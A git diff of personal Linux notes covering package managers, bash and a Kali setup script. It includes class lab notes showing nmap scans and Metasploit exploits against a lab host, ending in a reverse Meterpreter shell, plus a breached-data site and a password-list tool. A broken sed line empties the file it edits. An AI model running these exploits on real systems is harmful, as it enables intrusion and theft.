Fucked up a package's configuration files?
|
||||
|
||||
> sudo apt-get purge [thing]
|
||||
|
||||
> sudo apt autoremove
|
||||
|
||||
Check if you still have related things:
|
||||
|
||||
> apt search [thing]
|
||||
|
||||
> sudo apt-get install [ thing ]
|
||||
|
||||
Still have problems?
|
||||
|
||||
> sudo dpgk --force-confmiss -i /var/cache/apt/archives/[thing]
|
||||
|
5
distros/debian/ubuntu/lubuntu.md
Normal file
5
distros/debian/ubuntu/lubuntu.md
Normal file
@ -0,0 +1,5 @@
|
||||
|
||||
# Videos not working
|
||||
|
||||
> sudo apt-get install lubuntu-restricted-extras
|
||||
|
87
distros/kali/install-kali.sh
Normal file
87
distros/kali/install-kali.sh
Normal file
@ -0,0 +1,87 @@
|
||||
cd /usr/share/X11/xkb/symbols/
|
||||
cp pc pc.bak
|
||||
echo "pc backup copied - this isn't tested" >> ~/install.log
|
||||
sed s/Caps_Lock/Escape/ pc > pc
|
||||
cd
|
||||
echo "deb https://dl.bintray.com/hawkeye116477/waterfox-deb release main" | sudo tee -a /etc/apt/sources.list
|
||||
curl https://bintray.com/user/downloadSubjectPublicKey?username=hawkeye116477 | sudo apt-key add -
|
||||
sudo apt-get update && sudo apt-get install waterfox
|
||||
|
||||
echo "deb http://http.kali.org/ /kali main contrib non-free
|
||||
deb http://http.kali.org/ /wheezy main contrib non-free
|
||||
deb http://http.kali.org/kali kali-dev main contrib non-free
|
||||
deb http://http.kali.org/kali kali-dev main/debian-installer
|
||||
deb-src http://http.kali.org/kali kali-dev main contrib non-free
|
||||
deb http://http.kali.org/kali kali main contrib non-free
|
||||
deb http://http.kali.org/kali kali main/debian-installer
|
||||
deb-src http://http.kali.org/kali kali main contrib non-free
|
||||
deb http://security.kali.org/kali-security kali/updates main contrib non-free
|
||||
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free" >> /etc/apt/sources.list
|
||||
|
||||
setxkbmap gb
|
||||
|
||||
# gksudo firefox -install-global-extension addon-1865-latest.xpi
|
||||
#install addon with cli
|
||||
apt-get -y install openvpn
|
||||
cd /etc/openvpn
|
||||
|
||||
|
||||
sudo wget https://downloads.nordcdn.com/configs/archives/servers/ovpn.zip
|
||||
|
||||
unzip ovpn.zip
|
||||
|
||||
rm ovpn.zip
|
||||
|
||||
sudo apt-get install openvpn network-manager-openvpn network-manager-openvpn-gnome
|
||||
|
||||
wget https://github.com/maestrogerardo/i3-gaps-deb/archive/master.zip
|
||||
|
||||
echo "if you don't have openvpn options in your gnome desktop, this just isn't going to work. Get the openvpn manager, called 'openvpn-service-gnome' or some such" >> ~/*log
|
||||
unzip ma*
|
||||
|
||||
rm ma*zip
|
||||
|
||||
cd i3-g*
|
||||
|
||||
sudo apt -y update;sudo apt -y upgrade
|
||||
|
||||
./i3*
|
||||
|
||||
cd
|
||||
|
||||
mv i3/ .config
|
||||
|
||||
sudo apt install feh compton ranger w3m cmus scrot
|
||||
|
||||
sudo apt install tor
|
||||
|
||||
wget https://github.com/dpayne/cli-visualizer/archive/master.zip
|
||||
|
||||
echo "If vis is playing funny-buggers, enter the install files and input the commands manually. May be an architecture problem as I don't have arm cpu" >> *log
|
||||
|
||||
unzip master.zip
|
||||
|
||||
rm master.zip
|
||||
|
||||
cd cli-vis*
|
||||
|
||||
apt install libfftw3-dev libncursesw5-dev libpulse-dev
|
||||
|
||||
./install.sh
|
||||
|
||||
cd
|
||||
|
||||
|
||||
mkdir Images;mkdir Images/Wallpapers;mkdir Images/Screenshots
|
||||
|
||||
apt install -y encfs cmatrix cowsay
|
||||
|
||||
mkdir Tools
|
||||
|
||||
cd Tools
|
||||
|
||||
wget https://github.com/Mebus/cupp/archive/master.zip
|
||||
|
||||
unzip master.zip;rm master.zip
|
||||
|
||||
cd
|
124
distros/kali/metasploit.md
Normal file
124
distros/kali/metasploit.md
Normal file
@ -0,0 +1,124 @@
|
||||
> service postgresql start
|
||||
|
||||
> systemctl status postgresql
|
||||
|
||||
> msfdb init
|
||||
|
||||
start the metasploit
|
||||
|
||||
> msfconfole
|
||||
|
||||
show exploits
|
||||
|
||||
Examples:
|
||||
|
||||
> info exploit/something
|
||||
|
||||
> search cve:2019
|
||||
|
||||
## Basic theory
|
||||
|
||||
There are vulnerabilities and payloads.
|
||||
|
||||
Payloads would typically give us a shell on the remote system. Android, Linux and Windows require different shells.
|
||||
|
||||
You can attach via 'reverse' or 'bind'. A 'bind' is best, as the user opens a port, and you connect. Mostly, you have to use 'reverse', which opens a connection to you.
|
||||
|
||||
# Notes for Class
|
||||
|
||||
Victim: 172.18.3.26
|
||||
|
||||
> nmap -Pn -sV 172.18.3.26 --script=vuln
|
||||
|
||||
> nmap -Pn -sV 172.18.3.26
|
||||
|
||||
Output:
|
||||
|
||||
```
|
||||
|
||||
Service scan Timing: About 66.67% done; ETC: 15:28 (0:00:10 remaining)
|
||||
Nmap scan report for 172.18.3.26
|
||||
Host is up (0.016s latency).
|
||||
Not shown: 988 filtered ports
|
||||
PORT STATE SERVICE VERSION
|
||||
21/tcp open ftp Microsoft ftpd
|
||||
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
|
||||
80/tcp open http Microsoft IIS httpd 7.5
|
||||
4848/tcp open appserv-http?
|
||||
8022/tcp open oa-system?
|
||||
8080/tcp open http Sun GlassFish Open Source Edition 4.0
|
||||
8383/tcp open ssl/m2mservices?
|
||||
9200/tcp open tcpwrapped
|
||||
49153/tcp open unknown
|
||||
49154/tcp open unknown
|
||||
49159/tcp open unknown
|
||||
49161/tcp open tcpwrapped
|
||||
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
|
||||
SF-Port4848-TCP:V=7.80%I=7%D=9/14%Time=5D7D06F5%P=x86_64-pc-linux-gnu%r(Ge
|
||||
SF:tRequest,91,"HTTP/1\.1\x20302\x20Found\r\nLocation:\x20https://metasplo
|
||||
SF:itable3-win2k8:4848/\r\nDate:\x20Sat,\x2014\x20Sep\x202019\x2015:27:44\
|
||||
SF:x20GMT\r\nConnection:\x20close\r\nContent-Length:\x200\r\n\r\n");
|
||||
MAC Address: D4:25:8B:B6:85:F5 (Intel Corporate)
|
||||
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
|
||||
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
|
||||
```
|
||||
|
||||
Note this one:
|
||||
|
||||
`9200/tcp open tcpwrapped`
|
||||
|
||||
Apparently that's 'elasticsearch', so in metasploit we can do:
|
||||
|
||||
`search elasticsearch`
|
||||
|
||||
```
|
||||
# Name Disclosure Date Rank Check Description
|
||||
- ---- --------------- ---- ----- -----------
|
||||
0 auxiliary/scanner/elasticsearch/indices_enum normal Yes ElasticSearch Indices Enumeration Utility
|
||||
1 auxiliary/scanner/http/elasticsearch_traversal normal Yes ElasticSearch Snapshot API Directory Traversal
|
||||
2 exploit/multi/elasticsearch/script_mvel_rce 2013-12-09 excellent Yes ElasticSearch Dynamic Script Arbitrary Java Execution
|
||||
3 exploit/multi/elasticsearch/search_groovy_script 2015-02-11 excellent Yes ElasticSearch Search Groovy Sandbox Bypass
|
||||
4 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
|
||||
|
||||
```
|
||||
|
||||
If you want to use 2, `use 2` or `use/multi/ela` then tab out.
|
||||
|
||||
> show options
|
||||
|
||||
> set rhost 172.18.3.26
|
||||
|
||||
The remote port's already set at this point.
|
||||
|
||||
We've so far done use, rhost, and port.
|
||||
|
||||
> exploit
|
||||
|
||||
```
|
||||
[*] Started reverse TCP handler on 172.18.3.112:4444
|
||||
[*] Trying to execute arbitrary Java...
|
||||
[*] Discovering remote OS...
|
||||
[+] Remote OS is 'Windows Server 2008 R2'
|
||||
[*] Discovering TEMP path
|
||||
[+] TEMP path identified: 'C:\Windows\TEMP\'
|
||||
[*] Sending stage (53845 bytes) to 172.18.3.26
|
||||
[*] Meterpreter session 1 opened (172.18.3.112:4444 -> 172.18.3.26:49311) at 2019-09-14 15:38:49 +0000
|
||||
[!] This exploit may require manual cleanup of 'C:\Windows\TEMP\LXjUK.jar' on the target
|
||||
```
|
||||
|
||||
> dir
|
||||
|
||||
# Next Wordpress
|
||||
|
||||
http://172.18.3.26:8585/wordpress/
|
||||
|
||||
Back to normal shell.
|
||||
|
||||
> search wordpress ninja
|
||||
|
||||
|
||||
> use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
|
||||
|
||||
|
8
distros/kali/webresources
Normal file
8
distros/kali/webresources
Normal file
@ -0,0 +1,8 @@
|
||||
https://coldwallet.io/
|
||||
|
||||
https://www.it-vn.com/2019/07/configure-ssh-to-avoid-from-shodan-and.html
|
||||
|
||||
https://wickr.com
|
||||
|
||||
https://weleakinfo.com/
|
||||
|
11
distros/redhat/Oracle/basics.md
Normal file
11
distros/redhat/Oracle/basics.md
Normal file
@ -0,0 +1,11 @@
|
||||
|
||||
> cd /etc/yum.repos.d/
|
||||
|
||||
> vim public.yum*
|
||||
|
||||
These are branches of the same Oracle server.
|
||||
|
||||
The first - 'latest' - is enabled by default.
|
||||
|
||||
You can change 'enabled' from 0 to 1 for various repositories.
|
||||
|
11
distros/redhat/npm.md
Normal file
11
distros/redhat/npm.md
Normal file
@ -0,0 +1,11 @@
|
||||
package.json is the basic configuration file.
|
||||
|
||||
Everything is per-directory.
|
||||
|
||||
> npm install x
|
||||
|
||||
This'll install x in the current directory.
|
||||
|
||||
> npm init
|
||||
|
||||
> npm install express --save
|
22
distros/redhat/yum.md
Normal file
22
distros/redhat/yum.md
Normal file
@ -0,0 +1,22 @@
|
||||
# Overview
|
||||
|
||||
Forks include CentOS, scientific Linux, Oracle, and Fedora.
|
||||
|
||||
Major features: reliable, shit package selection.
|
||||
|
||||
# Basically yum
|
||||
|
||||
> yum search [package]
|
||||
|
||||
> yum list openssh
|
||||
|
||||
> yum install [package1] [package2]
|
||||
|
||||
> yum check-updates
|
||||
|
||||
> yum update
|
||||
|
||||
yum remove [package1] [package2]
|
||||
|
||||
|
||||
|
8
distros/suse/http_server.md
Normal file
8
distros/suse/http_server.md
Normal file
@ -0,0 +1,8 @@
|
||||
Nothing interesting.
|
||||
|
||||
1. Install
|
||||
2. Set a dns resolver in /etc/resolv.conf (`nameserver 1.1.1.1` works)
|
||||
3. Enable NetworkManager
|
||||
3. zypper install http-something php5 apache2
|
||||
4. vi /srv/www/htdocs/index.html
|
||||
5. Enable apache2
|
43
distros/void/autologin
Normal file
43
distros/void/autologin
Normal file
@ -0,0 +1,43 @@
|
||||
# Automatic Login On TTY1
|
||||
|
||||
Create a new autologin service:
|
||||
|
||||
> cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1
|
||||
|
||||
Note: The name of the custom service file must end with -tty1 (or another valid port). Otherwise the run-script will not work.
|
||||
|
||||
> vim /etc/sv/agetty-autologin-tty1/conf:
|
||||
|
||||
```
|
||||
|
||||
GETTY_ARGS="--autologin yourusernamehere --noclear"
|
||||
BAUD_RATE=38400
|
||||
TERM_NAME=linux
|
||||
|
||||
```
|
||||
|
||||
If you are logged in on tty1 right now, logout, switch to tty2 (with CTRL+ALT+F2) and re-login there.
|
||||
|
||||
Disable the regular tty1 service and enable autologin:
|
||||
|
||||
> rm /var/service/agetty-tty1
|
||||
|
||||
> ln -s /etc/sv/agetty-autologin-tty1 /var/service
|
||||
|
||||
Now switch to tty1 and you should already be logged in there automatically.
|
||||
|
||||
Autostart Graphical Environment on Login
|
||||
|
||||
Add the following to your shell's profile file to start X and lock the tty session:
|
||||
|
||||
# Autologin on tty1
|
||||
|
||||
In `bashrc`.
|
||||
|
||||
```
|
||||
|
||||
if [ -z "$DISPLAY" ] && [ "$(fgconsole)" -eq 1 ]; then
|
||||
exec startx
|
||||
fi
|
||||
|
||||
```
|
21
distros/void/autologin.md
Normal file
21
distros/void/autologin.md
Normal file
@ -0,0 +1,21 @@
|
||||
|
||||
Make the autologin service:
|
||||
|
||||
> cp -R /etc/sv/agetty-tty1 /etc/sv/agetty-autologin-tty1
|
||||
|
||||
> echo "GETTY_ARGS="--autologin yourusernamehere --noclear"
|
||||
> BAUD_RATE=38400
|
||||
> TERM_NAME=linux" > /etc/sv/agetty-autologin-tty1/conf
|
||||
|
||||
> rm /var/service/agetty-tty1
|
||||
> ln -s /etc/sv/agetty-autologin-tty1 /var/service
|
||||
|
||||
Then stick this at the end of the bashrc:
|
||||
|
||||
```
|
||||
# autologin on tty1
|
||||
if [ -z "$DISPLAY" ] && [ "$(fgconsole)" -eq 1 ]; then
|
||||
exec startx
|
||||
fi
|
||||
|
||||
```
|
20
distros/void/basics.md
Normal file
20
distros/void/basics.md
Normal file
@ -0,0 +1,20 @@
|
||||
|
||||
# vkpurge
|
||||
|
||||
Old Void kernels are left on the boot partition. List them with:
|
||||
|
||||
> vkpurge list
|
||||
|
||||
Remove one with:
|
||||
|
||||
> vkpurge 2.8.2_4
|
||||
|
||||
Remove all but the latest with:
|
||||
|
||||
> vkpurge rm all
|
||||
|
||||
|
||||
# Brightness
|
||||
/sys/class/backlight/*/brightness
|
||||
|
||||
|
12
distros/void/extrace.md
Normal file
12
distros/void/extrace.md
Normal file
@ -0,0 +1,12 @@
|
||||
Monitor all processes:
|
||||
|
||||
> extrace
|
||||
|
||||
Monitor one process:
|
||||
|
||||
> extrace ls
|
||||
|
||||
Monitor a script:
|
||||
|
||||
> ./script.sh | extrace
|
||||
|
20
distros/void/kernels.md
Normal file
20
distros/void/kernels.md
Normal file
@ -0,0 +1,20 @@
|
||||
|
||||
# vkpurge
|
||||
|
||||
Old Void kernels are left on the boot partition. List them with:
|
||||
|
||||
> vkpurge list
|
||||
|
||||
Remove one with:
|
||||
|
||||
> vkpurge 2.8.2_4
|
||||
|
||||
Remove all but the latest with:
|
||||
|
||||
> vkpurge rm all
|
||||
|
||||
# Troubleshooting
|
||||
|
||||
Filled up your /boot? Try reconfiguring and installing the latest:
|
||||
|
||||
> xbps-reconfigure -f linux5.2
|
6
distros/void/keyboard
Normal file
6
distros/void/keyboard
Normal file
@ -0,0 +1,6 @@
|
||||
|
||||
To list keyboard specs:
|
||||
|
||||
> locale
|
||||
|
||||
|
64
distros/void/lxc
Normal file
64
distros/void/lxc
Normal file
@ -0,0 +1,64 @@
|
||||
#Intro
|
||||
Taken from [this](https://r4nd0m6uy.ch/unpriviledged-containers-in-void-linux.html)
|
||||
Void linux requires additional steps to set up, as Systemd is no present to automatically take care of everything.
|
||||
|
||||
> sudo xbps-install cgmanager dbus bridge-utils lxc
|
||||
|
||||
Next, startup services:
|
||||
|
||||
> sudo ln -s /etc/sv/dbus/ /var/service/
|
||||
|
||||
> sudo ln -s /etc/sv/cgmanager/ /var/service/
|
||||
|
||||
> sudo sv start dbus
|
||||
|
||||
> sudo sv start cgmanager
|
||||
|
||||
|
||||
> sudo sv start dbus
|
||||
|
||||
> sudo sv start cgmanager
|
||||
|
||||
Maps your user account to the lxc g/u ids:
|
||||
|
||||
> sudo usermod --add-subuids 100000-165536 $USER
|
||||
|
||||
> sudo usermod --add-subgids 100000-165536 $USER
|
||||
|
||||
Then add a bridge interface to connect the container.
|
||||
|
||||
> sudo brctl addbr lxbr0
|
||||
|
||||
Then add an interface. I have no idea how this is done or what it means, so I tried my wifi 'wlp3s0', and that was refused. I tried the guide's one, which obviously didn't work as I didn't have the same interface as in the guide. Finally, I tried `ip addr show` and noticed other devices 'lo' and 'wwp0s20u4i6'. This gave me:
|
||||
|
||||
> sudo brctl addif lxbr0 wwp0s20u4i6
|
||||
|
||||
... which worked.
|
||||
|
||||
If you don't want to redo this each boot, you can make a runit service for it apparently - more research is required for this. For now, I'm just copy-pasting the guide (almost) and sticking this in ~/.config/lxc/default.conf:
|
||||
|
||||
`lxc.network.type = veth`
|
||||
|
||||
`lxc.network.link = wwp0s20u4i6`
|
||||
|
||||
`lxc.network.flags = up`
|
||||
|
||||
`lxc.network.hwaddr = 00:16:3e:BB:CC:DD`
|
||||
|
||||
`lxc.id_map = u 0 100000 65536`
|
||||
|
||||
`lxc.id_map = g 0 100000 65536`
|
||||
|
||||
You can now configure a different bridge each boot to connect with the lxc containers, or ....
|
||||
|
||||
Next, do this at *every boot* (or script it):
|
||||
|
||||
> sudo cgm create all $USER
|
||||
|
||||
> sudo cgm chown all $USER $(id -u) $(id -g)
|
||||
|
||||
> cgm movepid all $USER $$
|
||||
|
||||
|
||||
|
||||
|
34
distros/void/networking.md
Normal file
34
distros/void/networking.md
Normal file
@ -0,0 +1,34 @@
|
||||
# Bridged adapters
|
||||
|
||||
Virtual machines can use a bridge to connect to the internet. Access the manual with
|
||||
|
||||
> man brctl
|
||||
|
||||
You can add a new bridge with:
|
||||
|
||||
> brctl addbr <name>
|
||||
|
||||
... and delete a bridge by pulling it down, then
|
||||
|
||||
> brctl delbr <name>
|
||||
|
||||
# wpa_supplicant
|
||||
|
||||
> scan
|
||||
|
||||
> scan_results
|
||||
|
||||
> add_network
|
||||
|
||||
> set_network 0 ssid "MYSSID"
|
||||
|
||||
> set_network 0 psk "passphrase"
|
||||
|
||||
OR > set_network 0 key_mgmt NONE
|
||||
|
||||
> enable_network 0
|
||||
|
||||
> save_config
|
||||
|
||||
might want to 'sudo sv restart dhcpcd'
|
||||
|
20
distros/void/rpi-void-install.sh
Normal file
20
distros/void/rpi-void-install.sh
Normal file
@ -0,0 +1,20 @@
|
||||
#!/bin/sh
|
||||
|
||||
ln -s /etc/sv/ntpd /var/service
|
||||
|
||||
sv start ntpd
|
||||
|
||||
sleep 3
|
||||
|
||||
ntpd -q
|
||||
|
||||
echo 'dtparam=audio=on' >> /boot/config.txt
|
||||
|
||||
xbps-install -Syuv
|
||||
|
||||
xbps-install -Sy xorg-minimal xf86-video-fbturbo
|
||||
|
||||
useradd -m -G wheel,audio,video ghost
|
||||
|
||||
xbps-install sc-im vim cowsay lolcat-c ranger lf bash
|
||||
|
12
distros/void/sv
Normal file
12
distros/void/sv
Normal file
@ -0,0 +1,12 @@
|
||||
# Basics
|
||||
|
||||
Services display in /var/service
|
||||
sv up ssh
|
||||
sv down ssh
|
||||
sv restart ssh
|
||||
|
||||
# Making a Service
|
||||
|
||||
Look in the `/etc/sv` directory, then in the existing services' run files.
|
||||
You'll find a simple dash script (therefore Posix compliant).
|
||||
|
115
distros/void/xbps.md
Normal file
115
distros/void/xbps.md
Normal file
@ -0,0 +1,115 @@
|
||||
Install cowsay
|
||||
|
||||
> xbps-install cowsay
|
||||
|
||||
Look for cowsay
|
||||
|
||||
> xbps-query -Rs cowsay
|
||||
|
||||
Upgrade current packages. -R looks at repositories, -s makes things sloppy.
|
||||
|
||||
> xbps-install -Suv
|
||||
|
||||
Remove cowsay
|
||||
|
||||
> xbps-remove cowsay
|
||||
|
||||
...and all dependencies
|
||||
|
||||
> xbps-remove -R cowsay
|
||||
|
||||
Reinstall cowsay
|
||||
|
||||
> xbps-install -f
|
||||
|
||||
Reconfigure all packages. Useful for breakages.
|
||||
|
||||
> xbps-pkgdb -a
|
||||
|
||||
Remove all dependencies.
|
||||
|
||||
> xbps-remove -o
|
||||
|
||||
Show information about cowsay
|
||||
|
||||
> xbps-query -RS cowsay
|
||||
|
||||
Search for cows
|
||||
|
||||
> xbps-query -Rs cows
|
||||
|
||||
List packages requiring updates.
|
||||
|
||||
> xbps-install -Suvn
|
||||
|
||||
List what's required for cowsay
|
||||
|
||||
> xbps-query -x cowsay
|
||||
|
||||
List what's installed.
|
||||
|
||||
> xbps-query -l
|
||||
|
||||
Clean.
|
||||
|
||||
> xbps-remove -O
|
||||
|
||||
apt update
|
||||
|
||||
> xbps-install -S
|
||||
|
||||
Remove package information.
|
||||
|
||||
> xbps-query -R
|
||||
|
||||
Display all cowsay files
|
||||
|
||||
> xbps-query -Rf cowsay
|
||||
|
||||
Do I have cowsay installed?
|
||||
|
||||
> xbps-query -s cowsay
|
||||
|
||||
What packages are pointless?
|
||||
|
||||
> xbps-query -O
|
||||
|
||||
> xbps-install -Sn cowsay
|
||||
|
||||
A dry-run of installing cowsay, without actually intalling.
|
||||
|
||||
# Advanced
|
||||
|
||||
> xbps-query -x cowsay
|
||||
|
||||
Show cowsay's dependencies. The -R flag's required for a remote package.
|
||||
|
||||
> xbps-query -X cowsay
|
||||
|
||||
Show the reverse dependencies of a package.
|
||||
|
||||
> xbps-query -XR cowsay
|
||||
|
||||
Show all reverse dependencies of a package, including repository packages.
|
||||
|
||||
> xbps-query -m
|
||||
|
||||
List all manually installed software.
|
||||
|
||||
# Problems
|
||||
|
||||
Look for broken packages.
|
||||
|
||||
> sudo xbps-pkgdb -a
|
||||
|
||||
And if you've found any, you might try:
|
||||
|
||||
> sudo xbps-reconfigure -af
|
||||
|
||||
This reconfigures all packages forcefully.
|
||||
|
||||
If that doesn't help the issue, try to find the broken package and forcefully reinstall:
|
||||
|
||||
> xbps-query -s gnutls
|
||||
|
||||
> sudo xbps-install -f gnutls
|
58
fundamentals/archives.md
Normal file
58
fundamentals/archives.md
Normal file
@ -0,0 +1,58 @@
|
||||
# Automatic Backups with `find`
|
||||
|
||||
> find /home/"$(whoami)" -type f -size -2M | xargs zip -u backup
|
||||
|
||||
# Tar Archives
|
||||
|
||||
Create ze files:
|
||||
|
||||
> tar czf file.tar.gz file1 file2
|
||||
|
||||
Extract ze files:
|
||||
|
||||
> tar xzf file.tar.gz
|
||||
|
||||
The .tar extension means two or more files are bundled together into a single file. The .tar.gz means compression.
|
||||
|
||||
Tarballs come with a number of arguments.
|
||||
|
||||
- c means 'create'.
|
||||
|
||||
- v means 'verbose'.
|
||||
|
||||
- f means 'this is the file' and must always be the ultimate argument.
|
||||
|
||||
- z means compression.
|
||||
|
||||
So we can compress file1 and file2 into a single tar called 'archive' with:
|
||||
|
||||
> tar czvf archive.tar.gz file1 file2
|
||||
|
||||
Extraction uses 'x' instead of 'c'.
|
||||
|
||||
> tar xzvf archive.tar.gz
|
||||
|
||||
Create a very compressed file:
|
||||
|
||||
> tar cfj super-compressed.tar.gz file1 file2
|
||||
|
||||
# Example - Compressing all Latex Files in /home/
|
||||
|
||||
> sudo find ~ -maxdepth 4 -name "*.txt" | xargs tar cvf latex-bundle.tar.gz
|
||||
|
||||
# ssh backup
|
||||
|
||||
Back up an unmounted partition with ssh:
|
||||
|
||||
> sudo dd if=/dev/sda1 | ssh -C ghost@192.168.0.10 "dd of=/home/ghost/backup.img" status=progress
|
||||
|
||||
# img.xz
|
||||
|
||||
Unzip the image with:
|
||||
|
||||
> unxz void.img.xz
|
||||
|
||||
This then deletes the .xz file. To keep it:
|
||||
|
||||
> unxz --keep void.img.xz
|
||||
|
34
fundamentals/at.md
Normal file
34
fundamentals/at.md
Normal file
@ -0,0 +1,34 @@
|
||||
`at` must be installed with:
|
||||
|
||||
> sudo apt-get install at
|
||||
|
||||
Then jobs can be specified with absolute time, such as:
|
||||
|
||||
> at 16:20
|
||||
|
||||
> at noon
|
||||
|
||||
> at midnight
|
||||
|
||||
> at teatime
|
||||
|
||||
The jobs can also be specified relative to the current time:
|
||||
|
||||
> at now +15 minutes
|
||||
|
||||
Finally, accept the jobs with ^D.
|
||||
|
||||
# Managing `at` Jobs
|
||||
|
||||
Display a list of commands to run with:
|
||||
|
||||
> atq
|
||||
|
||||
`2 Sat Oct 20 16:00:00 2018 a roach-1`
|
||||
|
||||
This will print all pending IDs. Remove a job by the ID with:
|
||||
|
||||
> atrm 2
|
||||
|
||||
Check /var/spool/cron/
|
||||
|
154
fundamentals/bash.md
Normal file
154
fundamentals/bash.md
Normal file
@ -0,0 +1,154 @@
|
||||
# STIN, STOUT, STERR
|
||||
|
||||
Input is 0, output is 1, error is 2.
|
||||
|
||||
Pipe standard output to log.txt while also outputting it.
|
||||
|
||||
> cat file.txt |& tee -a log.txt
|
||||
|
||||
Copy file and *if* that's successful, delete it where it stands.
|
||||
|
||||
> scp archive.tar.gz pi@192.168.0.31:/home/pi && rm archive.tar.gz
|
||||
|
||||
A double pipe will try one, and do the other if that fails.
|
||||
|
||||
> cp -r ~/Archive ~/Backup || tar czf Archive.tar.gz *
|
||||
|
||||
# REGEX
|
||||
Regular expression characters include:
|
||||
|
||||
\\ ^ $ . | ? * + () [] {}
|
||||
|
||||
As a result, grep cannot read these characters as literal characters unless they are escaped. E.g.
|
||||
|
||||
> grep wtf\? log.txt
|
||||
|
||||
... will search the string 'wtf?' in the file log.txt. Another version is egrep (now used with 'grep -e') which uses more characters as special characters, or fgrep, which treats all characters as literal strings.
|
||||
|
||||
|
||||
|
||||
# Environmental Variables
|
||||
PWD, USER, PATH
|
||||
|
||||
To display all environmental (but not local) variables, use
|
||||
|
||||
> env
|
||||
|
||||
Set a variable with
|
||||
|
||||
> colour=red
|
||||
|
||||
Display your variable with
|
||||
|
||||
> echo $colour
|
||||
|
||||
Export this to the entire system using:
|
||||
|
||||
> export colour=blue
|
||||
|
||||
# Search commands
|
||||
|
||||
> apropos cat
|
||||
|
||||
# Working with Text
|
||||
|
||||
Convert every tab to ten spaces.
|
||||
|
||||
> expand -t 10 file.txt
|
||||
|
||||
Or the reverse, with 3 spaces converting to a tab.
|
||||
|
||||
> unexpand -t 3 file.txt
|
||||
|
||||
Format a file by cutting text after 60 characters.
|
||||
|
||||
> fmt -w 60 file.txt
|
||||
|
||||
Indent all but the first line of a paragraph.
|
||||
|
||||
> fmt -t file.txt
|
||||
|
||||
Look at the new lines of a file only:
|
||||
|
||||
> tail -f /var/log/syslog
|
||||
|
||||
The sort function arranges lines alphabetically. Use -r to reverse and -n to sort by number.
|
||||
|
||||
# Sed
|
||||
|
||||
> sed -i s/hey/hoi/g greetings.txt
|
||||
|
||||
Edit all examples of hey to hoi in greetings and print that to the file.
|
||||
|
||||
# Measurement
|
||||
Measure how long a script takes for super-autism powers.
|
||||
|
||||
> time [bash script]
|
||||
|
||||
# Functions
|
||||
|
||||
> function my_funct(){ do_thing $1; }
|
||||
|
||||
Remove a function with
|
||||
|
||||
> unset my_function
|
||||
|
||||
# Paths
|
||||
Every shell has various paths from where it can execute binary files. Find out your current one with:
|
||||
|
||||
> echo $PATH
|
||||
|
||||
To add a directory to a path, e.g. /usr/share/bin, you can declare it in addition to the old path with:
|
||||
|
||||
> PATH=$PATH:/usr/share/bin
|
||||
|
||||
And then check it by echoing the path again.
|
||||
|
||||
Before this, probably best to check the path exists with:
|
||||
|
||||
> if [ -e /usr/share/bin ]; then
|
||||
|
||||
> echo yes
|
||||
|
||||
> fi
|
||||
|
||||
# Pipes, Pedantry and Brackets
|
||||
|
||||
Things that [[ ]] statements can do which [ ] statements cannot:
|
||||
|
||||
- Intuitive and easy 'and' statements.
|
||||
- [[ -z $var && -d ~/LK ]]
|
||||
- Intuitive and easy 'or' statements.
|
||||
- [[ -d LK || -f ghost-backup.zip ]]
|
||||
- Simple expression comparisons
|
||||
- [[ $v1 > $v2 ]]
|
||||
- Simple expression comparisons with clumsy strings
|
||||
- [[ item-1 > item-2 ]]
|
||||
- Vague comparisons
|
||||
- [[ $answer =~ ^y(es)?$ ]]
|
||||
|
||||
# exec
|
||||
|
||||
exec will start a process running as just that process. In a bash script, the line:
|
||||
|
||||
> unison rat
|
||||
|
||||
... will startup `unison` as a sub-process of bash. But:
|
||||
|
||||
> exec unison rat
|
||||
|
||||
... starts unison as its own process.
|
||||
|
||||
# Brace expansion
|
||||
|
||||
> mv picture{,-1}.jpg
|
||||
|
||||
This expands to
|
||||
|
||||
> mv picture.jpg picture-1.jpg
|
||||
|
||||
# `for` Statements
|
||||
|
||||
for f in *tiff;do
|
||||
convert "$f" "${f/.tiff/.png}"
|
||||
done
|
93
fundamentals/basics.md
Normal file
93
fundamentals/basics.md
Normal file
@ -0,0 +1,93 @@
|
||||
# Processes
|
||||
|
||||
Process id 1 is systemd. All other processes are child processes.
|
||||
|
||||
> ps -sH
|
||||
|
||||
This has every process on the system, and -H shows the hierarchy. This can be piped to less to view easily.
|
||||
|
||||
> ps -u ghost
|
||||
|
||||
Looking at processes spawned from user 'ghost'.
|
||||
|
||||
> ps -e --forest
|
||||
|
||||
Like tree, but more.
|
||||
|
||||
> ps -sfH
|
||||
|
||||
The fucking lot.
|
||||
|
||||
All of this is from /proc, which is a direct line to the kernel. Commands like `free', `top' et c. pulls from /proc.
|
||||
|
||||
# Top
|
||||
|
||||
In `top' we can take the pid and then press `k' in order to kill that process.
|
||||
|
||||
# check what's going on with qutebrowser
|
||||
|
||||
> ps aux | grep qutebrowser
|
||||
|
||||
# Check open ports
|
||||
sudo netstat -tulpn
|
||||
|
||||
#Check that udev process
|
||||
systemctl status udev
|
||||
|
||||
# Show net interface
|
||||
> ip addr show
|
||||
|
||||
This can also take arguments, such as the name of an interface.
|
||||
|
||||
# Find
|
||||
|
||||
> find . -name 'bob cv'
|
||||
|
||||
Find file 'bob cv'
|
||||
|
||||
> find . -size +7G
|
||||
|
||||
Find files of 7Gig or more.
|
||||
|
||||
> find -name *hidden* -type l
|
||||
|
||||
Find a symbolic link containing 'hidden' in the name.
|
||||
|
||||
> find -name *txt -delete
|
||||
|
||||
Delete all files from here of the *txt type.
|
||||
|
||||
> find -type d -empty
|
||||
|
||||
Find empty directories.
|
||||
|
||||
> find . mtime 50
|
||||
|
||||
Find all file modified precisely 50 days ago. There's also:
|
||||
|
||||
* -mtime +20
|
||||
* file modified more than 20 days ago.
|
||||
* -atime -13
|
||||
* file *accessed* less than 13 days ago.
|
||||
* -cmin 20
|
||||
* file *modified* 20 minutes ago.
|
||||
* -mmin +70
|
||||
* files modified more than 70 minutes ago.
|
||||
|
||||
|
||||
# Logs
|
||||
|
||||
> cat /var/logs/auth.log | grep fail
|
